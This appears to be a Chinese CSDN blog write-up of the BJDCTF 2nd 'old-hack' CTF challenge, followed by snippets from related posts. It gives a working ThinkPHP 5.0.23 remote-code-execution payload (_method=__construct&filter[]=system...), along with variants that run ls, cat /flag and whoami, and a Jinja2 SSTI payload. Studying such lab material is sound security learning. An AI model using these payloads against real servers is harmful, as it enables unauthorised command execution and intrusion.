[BJDCTF 2nd]old-hack 1

最新推荐文章于 2025-02-15 18:33:28 发布
最新推荐文章于 2025-02-15 18:33:28 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 命令执行 CMS和框架
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/109643474
版权

WP

一道直接利用thinkphp的RCE洞的题目。
首先进入环境,得知这是一个thinkphp5,通过输入?s=1来报错,获得版本信息(是一个小姿势):
在这里插入图片描述
tp5.0.23这个版本以及相近的版本以RCE而出名的,去网上搜一波payload,搜到了:

?s=captcha
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

直接打就可以执行。
在这里插入图片描述
在这里插入图片描述

不过我一开始执行的时候,光看到了

system(): Cannot execute a blank command

没看到他最上面的执行的结果。。。我以为因为过滤了system这个函数导致不能RCE。。。(我是瞎子。。)

然后我经过尝试,发现用shell_exec的时候不会再提示Cannot execute a blank command,但是没有回显,所以执行

echo `ls /` > 1.txt

然后去读1.txt看结果。。感觉自己还是要多观察回显。。。。。

BJDCTF 2nd WEB
A_dmin的博客
03-24 8029
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用payload打就行: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...
BJDCTF 2nd(WEB复现)
ChenZIDu的博客
04-02 939
记录一下,以后忘记了还能看看 fake google-飞机票 duangShell .index.php.swp源码泄露 一进去提示我们:how can i give you source code? .swp?!,获取源码后,利用vim再把它改回去就行,直接打开会乱码:vim -r index.php.swp恢复。 因为exec()无回显,而且没有禁curl。所以可以反弹shell~~ ...
[BJDCTF 2nd]old-hack
夜幕下的灯火阑珊的博客
05-13 1011
知识点 thinkphp 5.0.23 RCE漏洞 题目 题目提示thinkphp5 构造index.php?s=1报错看看 看到版本号为5.0.23,搜索一波5.0.23漏洞 ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 直接用payload打就是了
[BJDCTF 2nd] web题-old-hack
BROTHERYY的博客
07-13 370
复现环境:buuoj.cn 发现是thinkphp5,让页面报错找到了具体的版本号。 上网找了这个漏洞的payload POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 使用hackbar的post传递这个参数进去,查看根目录下的文件 读取flag flag{dc909607-e27c-40a9-86e8-2de6079ed503} ...
[BJDCTF 2nd]old-hack -wp
freerats的博客
07-04 402
进入网站,看到提示,powered By THINKPHP5 知道肯定与thinkphp5有关 传入一个s=1报错查看一下信息(这里要遇见过才知道,没什么技巧) 版本为50.0.23 post提交 _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 触发命令执行漏洞 cat /flag ...
[BJDCTF 2nd] old-hack
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-22 754
漏洞:ThinkPHP 5.0.23 RCE 参考https://www.codercto.com/a/54587.html http://ip_addr/index.php?s=captcha payload _method=__construct&filter[]=system&method=get&get[]=whoami
buuctf.crypto 1-100
最新发布
m0_73889365的博客
02-15 1275
buuctf crypto 刷题
CTF-Web-SQL注入
beihai2013
01-26 3470
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
thinkphp5漏洞几道例题
wo41ge的博客
11-14 270
漏洞 具体看这里 ThinkPHP5.0.23(远程命令执行) 例题[BJDCTF 2nd]old-hack index.php?s=1查看版本 POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag ThinkPHP V5.0.20(远程
【学习笔记14】buu [BJDCTF 2nd]old-hack
weixin_43553654的博客
05-14 375
首先打开网站一看,映入眼球,thinkphp,但是不知道是什么版本的所以就想办法构造一个报错来让它显示一些更详细的信息http://59429912-fc6a-4d2d-945a-c1aabf47f19f.node3.buuoj.cn/?s=3 这样就可以看到thinkphp的版本了是5.0.23版本接下来就简单了求助度娘,查找thinkphp5.0.23对应版本的漏洞最后在...
php system 执行失败,PHP 执行 system、exec 等函数发生错误
weixin_39922147的博客
03-10 806
2012-12-06 20:451932人阅读评论(0)往往在调用system、exec 等函数时,要么没有反应,要么出错:原因很多,以下是抄别人的:====================================================================================错误分析:1、Warning: system() has been disable...
ctfshow-web入门-文件上传(web164、web165)图片二次渲染绕过
Welcome To Myon'Blog !
07-09 2269
web164 和 web165 的利用点都是二次渲染,一个是 png,一个是 jpg二次渲染:网站服务器会对上传的图片进行二次处理,对文件内容进行替换更新,根据原有图片生成一个新的图片,这样就会改变文件原有的一些内容,我们需要将一句话木马插入到数据不会被改变的位置,确保一句话木马不会受到二次渲染的影响。
小皮面板(PHP study_pro)无法启动MySQL
m0_73108620的博客
02-16 2826
win+R输入regedit打开注册表选择\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MySQLHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\MySQL 将MySQL删除(如果名称是MySQLa继续删除)输入sc delete mysql进行删除操作。(找不到的话在C盘中搜索MySQL寻找该路径下的对应文件夹)输入sc delete mysql进行删除操作。
【CTF】命令执行RCE
qq_53099119的博客
04-02 4351
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
PHP 执行 system、exec 等函数发生错误
热门推荐
agoago_2009的专栏
12-06 2万+
往往在调用system、exec 等函数时,要么没有反应,要么出错: 原因很多,以下是抄别人的: ==================================================================================== 错误分析: 1、Warning: system() has been disabled for security r
asp 执行 exe_Web安全:命令执行漏洞
weixin_39767386的博客
11-24 396
命令执行是指攻击者通过浏览器或者其他客户端软件提交一些cmd命令(或者bash命令)至服务器程序,服务器程序通过system、eval及exec等函数直接或者间接地调用cmd.exe执行攻击者提交的命令。命令执行漏洞产生的原因是,开发人员在编写PHP代码时,没有对代码中可执行的特殊函数入口进行过滤,导致客户端可以提交一些cmd命令(或者bash命令),并交由服务器程序执行。服务器程序没有...
LFI-labs||lfi-labs-master通关
qq_29959945的博客
12-29 843
lfi-labs-master 通关教程
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值